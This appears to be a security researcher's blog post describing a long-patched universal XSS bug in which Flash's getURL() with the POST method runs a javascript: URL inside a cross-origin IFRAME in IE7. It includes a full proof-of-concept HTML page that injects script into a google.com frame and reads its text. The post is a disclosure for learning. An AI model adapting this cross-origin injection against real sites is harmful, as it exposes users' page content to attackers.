UXSS Using Flash getURL POST Method

This one surprised me. I noticed that Flash’s getURL() function, when called with the "POST" method and a javascript: URL as the target, could execute script inside an IFRAME on a different domain. The trick relies on Flash passing the javascript URL to the named target frame using a POST navigation, which IE’s engine would then execute in the context of that frame.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>xDomain using getURL from Flash with POST Method</TITLE></HEAD>
<BODY>
<FONT FACE="Verdana" SIZE="2">
xDomain using getURL from Flash <U>with POST Method</U>. Works also on IE7. We have an IFRAME called "myTarget" and a .swf file that does this:<BR><BR>
Usage: getURL (URL, TARGET, METHOD)<BR>
<B>getURL("javascript:anyCode(), "myTarget", "POST");</B><BR><BR>
So the javascript URL works inside an IFRAME that is on a different domain. :(<BR><BR>
</FONT>

<object ID="daFlash" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="flashtest.swf"/></object>
<IFRAME NAME="myTarget" ID="myTargetID" WIDTH="400" HEIGHT="200" SRC="http://www.google.com/"></IFRAME>


<SCRIPT LANGUAGE="JavaScript">
function loadTrickyFlash(){
	//	Make sure that the Flash is loaded before writing variables.
	if (document.all.daFlash.readyState==4){
		document.all.daFlash.setVariable('URL','javascript:void(document.body.insertAdjacentHTML("afterBegin","<BR><BR><H1>I shouldn\'t be here :(</H1>"));alert(document.body.innerText)');
		document.all.daFlash.setVariable('TARGET','myTarget');
		//	Because the .swf is waiting for those variables, as soon as it receive them, it will do a getURL with those values
		//	using the POST Method. If we try with GET, it won't work.
		//	This is the line of code that the Flash runs: getURL(URL [Javascript], TARGET [The IFRAME], "POST");
	}
	else setTimeout('loadTrickyFlash()',100);
}
//	Wait onload event from the IFRAME. In my opinion, this shouldn't be possible.
//	An IFRAME should be completely isolated from the main document.
document.all.myTargetID.attachEvent('onload', loadTrickyFlash);
</SCRIPT>
</BODY>
</HTML>

The getURL() function in Flash ActionScript accepts a method parameter (GET or POST). When the method is POST, Flash hands the navigation to the browser differently than with GET, and the browser’s frame-targeting logic would execute the javascript: URL inside the named target — even if that target was a cross-origin IFRAME. Using GET didn’t reproduce the issue, which points to a difference in how the two navigation paths were processed. This entry contains compiled Flash artifacts (.fla/.swf) that are not included here.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Flash Plugin: Checking Whether a Local File Exists via readyState] :: [UXSS: IE7 + Flash 9 getURL GET Method Allows Cross-Origin Script Injection] >